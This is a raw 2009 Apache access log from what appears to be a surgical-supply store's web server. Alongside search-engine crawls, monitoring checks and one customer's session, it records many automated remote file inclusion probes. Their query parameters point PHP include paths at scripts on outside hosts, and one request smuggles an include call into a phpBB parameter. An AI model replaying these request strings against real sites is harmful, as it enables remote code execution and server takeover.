151.1.154.24 - - [20/Jun/2009:04:06:38 -0400] "GET /web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
151.1.154.24 - - [20/Jun/2009:04:06:38 -0400] "GET /logs/web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
151.1.154.24 - - [20/Jun/2009:04:06:38 -0400] "GET /logs/access_log.Q109053000/web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
151.1.154.24 - - [20/Jun/2009:04:06:41 -0400] "GET /web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
151.1.154.24 - - [20/Jun/2009:04:06:41 -0400] "GET /logs/web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
151.1.154.24 - - [20/Jun/2009:04:06:41 -0400] "GET /logs/access_log.Q109060200/web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:04:07:01 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:04:07:02 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:04:07:02 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
151.1.154.24 - - [20/Jun/2009:04:07:40 -0400] "GET /logs/access_log.Q109050900%20%20/web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
151.1.154.24 - - [20/Jun/2009:04:08:32 -0400] "GET /logs/access_log.Q109053000%20%20/web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:09:20 -0400] "GET /logs/senetman/html/index.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:09:20 -0400] "GET /senetman/html/index.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:09:20 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:09:24 -0400] "GET /senetman/html/index.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:09:24 -0400] "GET /logs/senetman/html/index.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:09:24 -0400] "GET /logs/access_log.Q109051100/senetman/html/index.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:04:09:44 -0400] "GET /logs/access_log.Q109053000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:04:09:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [20/Jun/2009:04:09:58 -0400] "GET /logs/access_log.Q109053000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:04:10:11 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
78.40.226.135 - - [20/Jun/2009:04:10:29 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:04:10:23 -0400] "GET /logs/access_log.Q109060100 HTTP/1.1" 200 4231911 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.231.42.152 - - [20/Jun/2009:04:11:00 -0400] "GET //xoops//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
66.249.71.54 - - [20/Jun/2009:04:12:22 -0400] "GET /images/over-index11_oscill.jpg HTTP/1.1" 200 2600 "-" "Googlebot-Image/1.0"
66.249.71.54 - - [20/Jun/2009:04:13:05 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.194.87.219 - - [20/Jun/2009:04:14:25 -0400] "GET /logs///index.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
209.59.12.99 - - [20/Jun/2009:04:14:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [20/Jun/2009:04:16:30 -0400] "GET /images/lcalen.htm HTTP/1.1" 200 7943 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.144.107 - - [20/Jun/2009:04:16:34 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
110.45.144.107 - - [20/Jun/2009:04:16:35 -0400] "GET /errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.144.107 - - [20/Jun/2009:04:16:35 -0400] "GET /logs/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
66.249.71.14 - - [20/Jun/2009:04:18:30 -0400] "GET /logs/access_log.Q109010400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.232.54.48 - - [20/Jun/2009:04:18:54 -0400] "GET /errors.php?error=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.249.71.14 - - [20/Jun/2009:04:19:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B81488E82120036EF04U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
119.152.61.41 - - [20/Jun/2009:04:19:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:19:49 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
209.59.12.99 - - [20/Jun/2009:04:19:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.195.130 - - [20/Jun/2009:04:19:52 -0400] "GET /logs/access_log.Q109052200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
119.152.61.41 - - [20/Jun/2009:04:19:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:19:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
74.200.195.130 - - [20/Jun/2009:04:19:57 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.200.195.130 - - [20/Jun/2009:04:19:57 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.200.195.130 - - [20/Jun/2009:04:19:57 -0400] "GET /logs/access_log.Q109061100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
195.34.78.110 - - [20/Jun/2009:04:20:30 -0400] "GET //classes/ps_session.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:20:30 -0400] "GET /logs//classes/ps_session.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:20:30 -0400] "GET /logs/access_log.Q109051300//classes/ps_session.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:21:30 -0400] "GET /logs/access_log.Q109052200//classes/ps_session.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:04:21:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B814A96325500CEEF072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
119.152.61.41 - - [20/Jun/2009:04:22:01 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077 HTTP/1.1" 200 36037 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:03 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077 HTTP/1.1" 200 36037 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:06 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:06 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:06 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:06 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:06 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:07 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:07 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:07 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:07 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:07 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:07 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:08 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:09 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:11 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:11 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:11 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:11 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:11 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:11 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:12 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:12 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:12 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:12 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:22:12 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
119.152.61.41 - - [20/Jun/2009:04:23:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0000077" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; FDM)"
66.249.71.14 - - [20/Jun/2009:04:23:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8C226200460F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.239.22.167 - - [20/Jun/2009:04:24:03 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
94.23.200.54 - - [20/Jun/2009:04:24:21 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:04:24:21 -0400] "GET //appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:04:24:21 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:24:46 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:24:46 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:24:46 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jun/2009:04:24:47 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jun/2009:04:24:48 -0400] "GET /errors.php?error=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
210.109.101.217 - - [20/Jun/2009:04:24:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:24:50 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:24:50 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.107 - - [20/Jun/2009:04:24:50 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.232.54.48 - - [20/Jun/2009:04:24:51 -0400] "GET /logs/errors.php?error=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jun/2009:04:24:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [20/Jun/2009:04:24:58 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
94.23.200.54 - - [20/Jun/2009:04:24:59 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:04:27:34 -0400] "GET //appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:04:27:34 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:04:27:34 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:04:27:44 -0400] "GET /logs/access_log.Q109060100//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.200.195.130 - - [20/Jun/2009:04:27:53 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.200.195.130 - - [20/Jun/2009:04:27:53 -0400] "GET /errors.php?error=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.200.195.130 - - [20/Jun/2009:04:27:53 -0400] "GET /logs/errors.php?error=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
94.23.200.54 - - [20/Jun/2009:04:28:04 -0400] "GET //appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:04:28:04 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
